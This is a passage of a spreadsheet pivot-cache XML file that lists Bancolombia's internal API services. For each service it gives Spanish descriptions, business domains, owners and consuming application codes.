    <n v="524133"/>
    <n v="500477"/>
    <n v="500874"/>
    <n v="500728"/>
    <n v="602091"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-10-30T17:14:03"/>
    <s v="Consignments"/>
    <n v="300"/>
    <s v="Consignments - Validate Automatic Credit"/>
    <n v="200"/>
    <s v="consignments-validate-automatic-credit"/>
    <s v="Esta API valida si la cuenta de depósito de un cliente Bancolombia permite el abono automático."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="ConsultaRemesas/V1.0"/>
    <s v="CIB_ISCIB0001"/>
    <s v="APP_AAA _x000d__x000a_ TransferWise_TNW _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ Remitly_RTY _x000d__x000a_ Uniteller_UTL _x000d__x000a_ OmnexGroup_UNO _x000d__x000a_ More_MOR _x000d__x000a_ WorldRemit_WRT _x000d__x000a_ RiaFinancialServices_RIA _x000d__x000a_ SmallWorld_OMX _x000d__x000a_ Moneygram_MNR"/>
    <n v="151906"/>
    <n v="147659"/>
    <n v="150650"/>
    <n v="154765"/>
    <n v="180140"/>
    <x v="4"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Archivo Recaudos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Consultar la información a detalle de un archivo, es necesario usar primero la capacidad listar archivos y obtener toda la información necesaria para obtener el detalle. La información podrá ser buscada con diferentes filtros asociados al pagador, la factura o detalles del archivo"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001 _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Archivos Enviados Recaudador"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La API permite listar los archivos que el core de recaudos le ha enviado al recaudador, estos pueden contener información sobre los recaudos que fueron captadas (consolidado o tiempo real) o novedades"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Banco"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="_x000a_El servicio permite consultar desde las filiares del exterior (Bancolombia Panamá, sucursal Panamá, Bancolombia puerto rico y Bancolombia cayman) los bancos del exterior que se encuentran asociados a estas. _x000a_"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle - F.E_Panama_AW0709001"/>
    <s v="AW1185001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Caracteristicas Plan Cuenta"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio ConsultaCaracteristicasPlanCuenta  habilita las capacidades que permite consultar las características del plan de una cuenta de ahorros o corriente. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_NU0170001 _x000d__x000a_AW1177001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Catalogo Maestros"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Catalogo Maestros, permite consultar los catálogos de valores de los distintos atributos de los datos de información de cliente. Conteniendo la llave-valor, de los códigos y descripciones de los maestros del banco.  (Ejemplo: Cargos, Profesiones del cliente, entre otros)."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW1074001 _x000d__x000a_NU0038001 _x000d__x000a_NU0051001 _x000d__x000a_AW1249001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Catalogo Servicios Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite consultar el catálogo de servicios disponibles en Depósitos para procesar transacciones de forma masiva o por lotes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Catalogos Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Servicio ConsultaCatalogosDepositos habilita la consulta de los catálogos pertenecientes a las cuentas de depósito incluyendo bolsillos. permitirá a los consumidores consultar datos de referencia que se comportan como catálogos. Inicialmente, se habilita la consulta de transacciones que se pueden aplicar en los movimientos monetarios para los bolsillos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Centrales Internas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio “Consulta Centrales Internas” ofrece la capacidad de recolectar y calcular la información interna del comportamiento crediticio de un cliente en el banco, como es: Factoring, SUFI, Leasing, Bancolombia. Donde posteriormente, se realiza la calificación según las reglas definidas y previamente configuradas; obteniendo un rechazo o aprobación de dicha solicitud."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Clasificacion Cartera"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaClasificacionCartera, en su versión inicial, cuenta con la capacidad de consultar la clasificación del tipo de cartera para un crédito lo cual hace posible medir el riesgo en el otorgamiento de éste."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cliente Preferencial FNG"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar si una Pyme(persona natural o jurídica) que ha sido o está garantizada por el fondo nacional de garantías, hace parte de la base de clientes preferentes, al mismos tiempo entrega la información del cupo disponible."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Fondo Nacional de Garantias"/>
    <s v="AW1285001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Clientes"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaClientes permitirá la consulta de información de clientes de factoring en varios niveles de detalle."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Factoring"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Factoring"/>
    <s v="Lucas Daniel Betancourt"/>
    <m/>
    <s v="Solicitudes de Vinculación_Sucursal Virtual Factoring_AW0423001"/>
    <s v="AW0922 _x000d__x000a_TP _x000d__x000a_Allus"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Comision Canales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite la consulta de las comisiones que se cobran en los canales digitales banco, en base a la transacción que el cliente realiza desde un canal, a la que se asigna un código especifico parametrizado desde ITC, como por ejemplo una transferencia a otro banco, transferencias de fondos, transferencias cuenta Nequi, etc."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Canales Digitales Personas"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="NU0021001 _x000d__x000a_AW1170 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW0955001 _x000d__x000a_NU0146001 _x000d__x000a_NU0149001 _x000d__x000a_NU0215001 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Consolidados Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite a los clientes realizar las consultas de consolidados de cuentas de depósito. Estos consolidados pueden ser de diferentes tipos: consolidados de movimientos, consolidados de saldos, etc. Esto facilita a los clientes consumidores del servicio temas como la representación gráfica en cifras de las cuentas de depósito. Las cuentas de depósito hacen referencia a las cuentas de ahorro y las cuentas corriente del Grupo Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Convenio Nomina"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de Consulta Convenio Nomina proporciona a los consumidores, capacidades para obtener información relevante de los Convenios de Nómina, como el grupo de cobro, el tipo de plan, nombre de empleador, nombre del pagador entre otros. Ofrece la posibilidad de realizar la consulta por Nit, por número de convenio o por ambos al mismo tiempo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1285001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Convenio Recaudo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Convenio Recaudo permitirá listar y validar la información detallada de los convenios de recaudos. Está operación es vital para el funcionamiento de las apis de recaudos, ya que permite en cual de los dos core se encuentra la información del recaudo y además permitirá identificar el comportamiento de la mismo."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0021001 _x000d__x000a_AW1176 _x000d__x000a_AW1258011 _x000d__x000a_NU0051001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Convenios De Nomina"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Consulta Convenios de nómina permitirá obtener información de los convenios, la información podrá ser buscada por pagador, empleador o beneficiario, retornando información como tal del convenio y plan asociado.  "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0091001 _x000d__x000a_NU0169001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Costos Tarjeta Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="A través de este servicio, se pueden consultar los costos asociados a una tarjeta débito, como por ejemplo el valor de la cuota de manejo o el costo de reexpedir una tarjeta, etc."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Medios de pago Aceptacion"/>
    <s v="Productor"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Alfredo Alonso Parra Laverde"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_AW1128 _x000d__x000a_NU0170001 _x000d__x000a_NU0104001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" El servicio requerido en el Broker es una virtualización de operaciones que se van a exponer, ya sea en Bankvision (BV) o a futuro en cualquier otro aplicativo de productos del tipo depósitos, relacionadas con la consulta de Cuentas de Ahorro y Corrientes._x005f_x000D_ Este servicio cuando es consumido, devuelve la información detallada de una cuenta de ahorro o corriente, como por ejemplo, saldos disponibles, estado de la cuenta, numero de cotitulares de la cuenta, entre otra información detallada que se usa diariamente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW01065"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta Depositos"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v=" El servicio requerido en el Broker es una virtualización de operaciones que se van a exponer, ya sea en Bankvision (BV) o a futuro en cualquier otro aplicativo de productos del tipo depósitos, relacionadas con la consulta de Cuentas de Ahorro y Corrientes._x005f_x000D_ Este servicio cuando es consumido, devuelve la información detallada de una cuenta de ahorro o corriente, como por ejemplo, saldos disponibles, estado de la cuenta, numero de cotitulares de la cuenta, entre otra información detallada que se usa diariamente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Cuentas AFC_AW1110001"/>
    <s v="AW01065 _x000d__x000a_AW0937 _x000d__x000a_SU2 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_SUF _x000d__x000a_AW1272001 _x000d__x000a_AW1170 _x000d__x000a_AFC _x000d__x000a_AW0709001 _x000d__x000a_AW1311 _x000d__x000a_AW1365 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta MultiProducto"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio ConsultaCuentaMultiProducto permitirá a los consumidores consultar las cuentas multi producto asociadas a un cliente en específico en valores, adicionalmente podrá consultar la información de cuentas inscritas en valores y el histórico de cada cuenta."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1208001 _x000d__x000a_AW1208 _x000d__x000a_AW1298001 _x000d__x000a_NU0160001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuenta Recaudo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite consultar información de la cuenta del recaudo para conocer si es o no exclusiva para recaudo"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1258011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuentas AFC"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" Consulta que permite presentar al cliente información relacionada con su estado de cuenta AFC, tal como su valor ahorrado, beneficios ganados y perdidos, saldo disponible para vivienda y saldo disponible para diferente de vivienda, etc. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="GDE _x000d__x000a_AFC _x000d__x000a_AW1110001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Esta versión habilita las capacidades de consulta para cuentas de ahorro y corriente, el servicio permite a los consumidores consultar por medio de operaciones que devuelven la información básica y detallada según se requiera, adicionalmente tiene capacidades como listar las cuentas de las que es titular un cliente listar las cuentas canceladas y listar participantes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <s v="Depositós"/>
    <s v="AW1373 _x000d__x000a_NU0104001 _x000d__x000a_NU0064001 _x000d__x000a_AW1315014 _x000d__x000a_NU0010001 _x000d__x000a_AW1258011 _x000d__x000a_NU0139001 _x000d__x000a_AW1365 _x000d__x000a_NU0014001 _x000d__x000a_AW1326001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_AW1315001 _x000d__x000a_NU0091001 _x000d__x000a_NU0146001 _x000d__x000a_AW1151001 _x000d__x000a_NU0001001 _x000d__x000a_AW0360006 _x000d__x000a_NU0142001 _x000d__x000a_NU0135001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuota Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento  que se le otorgó._x000a_En la cuota se pueden distinguir dos componentes. El primero corresponde al reintegro de parte del capital prestado (Valor de la cuota) mientras que el otro concierne a los intereses generados (Tasa nominal mes vencido, Tasa efectiva anual, Valor numérico de la DTF_x000a_"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="AW1313 _x000d__x000a_AW1170 _x000d__x000a_AW1287"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Cuota Credito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite consultar el pago periódico que se compromete a realizar un cliente al banco con el fin de devolver el financiamiento que se le otorgó. En la cuota se pueden distinguir tres componentes. El primero corresponde al reintegro de parte del capital prestado (saldo) el segundo concierne a los intereses generados (interés fijo) y la tercera parte es la de los seguros (retenciones)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="NU0102001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Alertas y Notificaciones"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken. - Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son número de celular y correo electrónico autorizados para recibir notificaciones.  La anterior información se encuentra almacenada en el sistema de Alertas y Notificaciones."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="PCC - Programas Comunes Canales_Alertas_ISPCC0002"/>
    <s v="NU0102001 _x000d__x000a_AW0407 _x000d__x000a_AW1313 _x000d__x000a_AW1316001 _x000d__x000a_AW0360007 _x000d__x000a_AW1170 _x000d__x000a_NU0100001 _x000d__x000a_NU0004001 _x000d__x000a_NU0103001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1185001 _x000d__x000a_AW1316 _x000d__x000a_NU0147001 _x000d__x000a_NU0104001 _x000d__x000a_NU0170001 _x000d__x000a_AW0955001 _x000d__x000a_AW1299001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Cartera"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como alcance, la consulta de datos expuestos desde Cartera Bancolombia,  como datos del Maestro de Limites, Garatias, etc.  Dicho servicio será utilizado como primer alcance, en el proceso de Estudio de Crédito Unificado, dirigido a clientes Empresariales y Pymes Gerenciados, para las líneas de Negocio de BANCOLOMBIA, LEASING FACTORING. Las operaciones que serán implementadas como alcance del proyecto ECU Colombia serán la consulta de Cupos Bancolombia y Factotin y la consulta de Garantias"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="NU0102001 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_AW1313 _x000d__x000a_AW1294001 _x000d__x000a_NU0114001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Cliente Sufi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite la recuperación de la información de los clientes de SUFI, información relacionada con sus datos personales, información económica e información de contacto. A este servicio se le especifica una sola operación, a futuro se espera agregar mas operaciones que permita la consulta segmentada de toda la información de un Cliente; por ejemplo consulta de la información financiera"/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="ISSU20003 _x000d__x000a_AW1312001 _x000d__x000a_NU0204001 _x000d__x000a_NU0093001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Comerciales Sucursal"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite consultar información sobre los códigos de la sucursal, del Gerente y/o asesor de una sucursal, permite realizar búsquedas por el código CIF de la sucursal, el código CIF o la cédula de un asesor."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <s v="RSA-RELACIÓN SUCURSAL ASESOR_AW1242001"/>
    <s v="AW1177 _x000d__x000a_AW1313001 _x000d__x000a_AW0856 _x000d__x000a_AW1299001 _x000d__x000a_AW1176001 _x000d__x000a_AW1128 _x000d__x000a_AW1249 _x000d__x000a_AW1249001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Complementarios Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar información que es complementaria del cliente, estos datos corresponden a la calificación de riesgo interna, calificación interna, cliente tesorería, entre otros. "/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
    <s v="AW0899001 _x000d__x000a_AW1074001 _x000d__x000a_SVP _x000d__x000a_NU0038001 _x000d__x000a_AW1285001 _x000d__x000a_AW1176 _x000d__x000a_NU0254001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Consulta Datos Contacto Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite consultar información para realizar el contacto con los clientes, se retornar datos como, por ejemplo: dirección de residencia, teléfonos, email, entre otros. El servicio puede ser consultado con: la llave MDM del cliente, llave CRM del cliente, llave CIF del cliente, documento externo o con tipo y número de documento original del cliente. La información que se retorna corresponde a los datos maestros del cliente Bancolombia Colombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="MDM"/>
